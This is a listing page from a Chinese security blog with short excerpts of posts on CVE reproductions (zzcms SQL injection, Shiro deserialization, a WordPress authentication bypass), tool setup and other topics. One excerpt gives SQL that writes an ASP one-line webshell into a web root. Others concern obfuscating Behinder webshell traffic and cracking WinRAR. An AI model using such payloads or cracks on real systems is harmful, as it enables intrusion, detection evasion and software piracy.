漏洞扫描-TEST安全-漏洞空间

漏洞空间的文章

其他工具

sqlmap在匿名管道中报using ‘STDIN’ for parsing targets list

如图所示: 解决：通过跟踪断点信息，发现有个config的参数conf.stdinPipe的值和直接在shell中执行命令行的值不一致，所以在sqlmap的源码的lib/core/option.py 中的init()方法中设置conf.stdinPipe=None后解决了……

漏洞空间 2024-04-28

0 0
未分类

IDEA2020.2版本启动一个WEB服务

IDEA2020.2版本启动一个WEB服务 1、创建一个新项目 1、点击文件>新建>项目选择Empty Project,然后点击下一步然后点击下一步点击在新窗口打开在弹出来的框(文件>项目结构)>模块>添……

漏洞空间 2024-03-11

0 0
CMS漏洞

CVE-2020-19961(zzcms存在sql注入漏洞)

zz cms 2019 subzs.php 存在sql注入漏洞文件对应路径: zs/subzs.php 注入漏洞存在位置: 在showcookiezs函数中，第十六行sql语句将cookie中接收的zzcmscpid没闭合直接拼接查找调用showcookiezs的函数，在fix函……

漏洞空间 2024-01-23

0 0
未分类

shiro漏洞复现(CVE-2016-4437)

1、Shiro反序列化漏洞（CVE-2016-4437，Shiro-550）漏洞原理： shiro框架在登录时，如果勾选了RememberMe的功能，关闭浏览器再次访问时便无需再次登录，此时cookie中会增加一个rememberMe字段，其 value 的值是……

漏洞空间 2024-01-23

0 0
CMS漏洞

CVE-2023-2982漏洞复现 WordPress 社交登录和注册插件（Discord、Google、Twitter、LinkedIn）<= 7.6.4 - 身份验证绕过

CVE-2023-2982WordPress 社交登录和注册插件（Discord、Google、Twitter、LinkedIn）<= 7.6.4 - 身份验证绕过漏洞复现 WordPress的社交登录和注册（Discord、Google、Twitter、LinkedIn）插件在7.6.4之前（含7.……

漏洞空间 2023-11-25

0 0
WEB安全

access数据库导出数据表内容到根目录

创建表a1字段b create table a1(b text) 像表a1字段b里面写入数据 insert into a1 (b) values('<%execute request(1)%>') 把写入的数据导出到D:\web\11.asp SELECT b into [<%execute request(1)%>] i……

漏洞空间 2023-11-24

0 0
C/C++

docker安装SonarQube代码质量评估

docker安装SonarQube代码质量评估，SonarQube无法启动解决方案 1、第一处修改在物理机(VPS)内输入如下命令： vi /etc/sysctl.conf 添加如下内容： vm.max_map_count = 262144 fs.file-max = 65536 &nb……

漏洞空间 2023-11-07

0 0
WEB安全

冰蝎4.0流量分析及魔改

冰蝎4.0流量分析及魔改 0x00 前言冰蝎v4.0开放了传输协议的自定义功能，使得流量魔改更为简单方便，本文以jsp脚本类型为例，提供一些冰蝎4流量魔改的方式 0x01传输协议分析冰蝎4内置了如下几种传输协议，传输协……

漏洞空间 2023-08-19

0 0
其他工具

winrar7.13去广告破解版以及破解教程

WinRAR去广告下载并安装Resource Hacker,官网在：Resource Hacker (angusj.com)，这里就不赘述详细的安装过程了也可以通过下面连接进行下载reshacker 用Resource Hacker打开安装后的WinRAR.exe默认安装路径为C……

漏洞空间 2023-08-19

0 1
APP漏洞

Android APP隐私合规检测工具Camille安装和使用

一、简介现如今APP隐私合规十分重要，各监管部门不断开展APP专项治理工作及核查通报，不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口，检测是否第三方SDK调用。根据隐私合规的场景，辅助检查……

漏洞空间 2023-08-18

0 0